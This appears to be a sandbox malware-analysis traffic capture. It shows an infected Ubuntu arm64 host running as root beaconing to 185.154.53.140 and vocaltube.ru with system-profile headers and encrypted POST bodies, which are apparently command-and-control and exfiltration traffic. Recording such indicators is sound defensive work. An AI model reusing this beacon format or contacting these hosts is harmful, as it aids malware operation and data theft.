Nov 29, 2023 18:00:11.592051029 CET	124	OUT	Data Raw: 4f 37 54 58 8d 16 84 29 bb 1e da f6 25 09 b4 11 bb 78 18 86 0e b3 a1 b5 a1 ec 80 1d cb 53 b3 0d 42 8f 34 8a c4 d6 4f 43 e7 3d 87 a2 06 b6 ac e5 ff f4 2c 27 13 e8 71 32 e3 a8 Data Ascii: O7TX)%xSB4OC=,'q2
Nov 29, 2023 18:00:11.947338104 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:11 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/l Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.23	51174	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:14.025607109 CET	507	OUT	POST /ms HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 9 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:14.027679920 CET	75	OUT	Data Raw: 57 7a 71 5d 8d 14 d0 76 b2 Data Ascii: Wzq]v
Nov 29, 2023 18:00:14.383878946 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:14 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/ms Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.23	51178	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:28.364245892 CET	507	OUT	POST /s HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 50 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:28.367955923 CET	116	OUT	Data Raw: 57 7a 74 47 8c 44 c8 7c ed 68 ce fc 05 06 88 38 ca 29 5d c3 30 b3 a6 b3 f1 b3 98 7b eb 65 bf 0d 72 a3 4b da 9b 95 25 0c e3 2c d7 f1 53 ef fc b4 bc e0 Data Ascii: WztGD\|h8)]0{erK%,S
Nov 29, 2023 18:00:28.728324890 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:28 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/s Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.23	51180	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:28.364584923 CET	484	OUT	GET /get HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Arch: arm64 Cores: 2 Id: lXgcADDgNTANSlVMuXVSaaNzBRcFOC Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:28.728583097 CET	540	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:28 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/get Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.23	51182	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:28.368160009 CET	503	OUT	POST /ki HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 0 Arch: arm64 Cores: 2 Id: PyWRaVRDRnQAcWRRwJdRWSbSFfMtYu Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:28.732320070 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:28 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/ki Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.23	51190	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:30.732713938 CET	507	OUT	POST /l HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 58 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:30.786998034 CET	124	OUT	Data Raw: 4f 37 54 58 8d 16 84 29 bb 1e da f6 25 09 b4 11 bb 78 18 86 0e b3 a1 b5 a1 ec 80 1d cb 53 b3 0d 42 8f 34 8a c4 d6 4f 43 e7 3d 87 a2 06 b6 ac e5 ff f4 2c 27 13 e8 71 32 e3 a8 Data Ascii: O7TX)%xSB4OC=,'q2
Nov 29, 2023 18:00:31.089024067 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:30 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/l Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.23	51192	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:30.771353006 CET	507	OUT	POST /l HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 58 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:30.803013086 CET	124	OUT	Data Raw: 4f 37 54 58 8d 16 84 29 bb 1e da f6 25 09 b4 11 bb 78 18 86 0e b3 a1 b5 a1 ec 80 1d cb 53 b3 0d 42 8f 34 8a c4 d6 4f 43 e7 3d 87 a2 06 b6 ac e5 ff f4 2c 27 13 e8 71 32 e3 a8 Data Ascii: O7TX)%xSB4OC=,'q2
Nov 29, 2023 18:00:31.132596016 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:30 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/l Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.23	51198	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:33.079065084 CET	483	OUT	GET /h2 HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Arch: arm64 Cores: 2 Id: XkuYcgDAciutzIypiAiuryUVKkvyRo Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:33.443870068 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:33 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/h2 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.23	51204	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:36.347754002 CET	507	OUT	POST /ms HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 9 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:36.349129915 CET	75	OUT	Data Raw: 57 7a 71 5d 8d 14 d0 76 b2 Data Ascii: Wzq]v
Nov 29, 2023 18:00:36.707231998 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:36 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/ms Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	52160	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:00 UTC	395	OUT	GET /mg HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/mg Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:00 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:00 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:00 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	52164	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:03 UTC	431	OUT	GET /mu HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Cores: 2 Id: AVlUGnSVaInqKQGUMEBcdUNwlsHekB Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/mu Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:04 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 30 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:04 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:04 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.23	52168	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:06 UTC	433	OUT	GET /l HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/l Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:06 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:06 GMTContent-Type: text/htmlContent-Length: 548Connection: close
2023-11-29 17:00:06 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.23	52172	185.154.53.140	443

Timestamp	Bytes transferred	Direction	Data
2023-11-29 17:00:08 UTC	433	OUT	GET /l HTTP/1.1 Host: vocaltube.ru User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Referer: http://185.154.53.140/l Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
2023-11-29 17:00:08 UTC	143	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 57 65 64 2c 20 32 39 20 4e 6f 76 20 32 30 32 33 20 31 37 3a 30 30 3a 30 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 34 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 29 Nov 2023 17:00:08 GMTContent-Type: text/htmlContent-Length: 548Connection: close
